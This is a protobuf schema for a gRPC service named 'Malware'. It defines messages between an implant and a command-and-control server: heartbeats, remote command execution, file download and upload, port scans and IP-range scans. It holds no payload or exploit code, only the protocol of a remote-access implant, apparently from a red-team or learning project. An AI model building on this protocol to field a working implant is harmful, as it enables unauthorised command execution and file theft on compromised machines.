common/messages/messages.proto

syntax = "proto3";

package messages;

service Malware {
    rpc CheckCommandQueue (CheckCmdRequest) returns (CheckCmdReply) {}    
}

message ImplantReply {
    string module = 1;
    bytes args = 2; // Optional
    PortScanReply portscan = 3; // Optional 
    IPScanReply ipscan = 4; // Optional 
    int32 error = 5; // Optional 
}

message PortScanReply {
    enum Status {
        IN_PROGRESS = 0;
        COMPLETE = 1;
    }

    Status status = 1;
    int32 found = 2;
}
message IPScanReply {
    enum Status {
        IN_PROGRESS = 0;
        COMPLETE = 1;
    }

    Status status = 1;
    string ip = 2;
    uint32 port = 3;
    string cert = 4;
}

message Exec {
    string Exec = 1;
    repeated string Args = 2;
}

message PortScan {
    string ip = 1;
    uint32 startPort = 2;
    uint32 endPort = 3;
    bool cancel = 4; // True if should cancel current running scan
}

message IPScan {
    string ip_range = 1;
    bool cancel = 2;
}
message ListModules {}

message GetFile {
    string filename = 1;
}

message UploadFile {
    string filename = 1;
    bytes contents = 2;
}

// Implant -> C2
message CheckCmdRequest {
    oneof message {
        int64 heartbeat = 1;
        ImplantReply reply = 2;
    }
}


// C2 -> Implant
message CheckCmdReply {
    oneof message {
        int64 heartbeat = 1;
        Exec exec = 2;
        GetFile getfile = 3;
        UploadFile uploadfile = 4; 
        PortScan portscan = 5;
        ListModules listmodules = 6;        
        IPScan ipScan = 7;        
    }
}
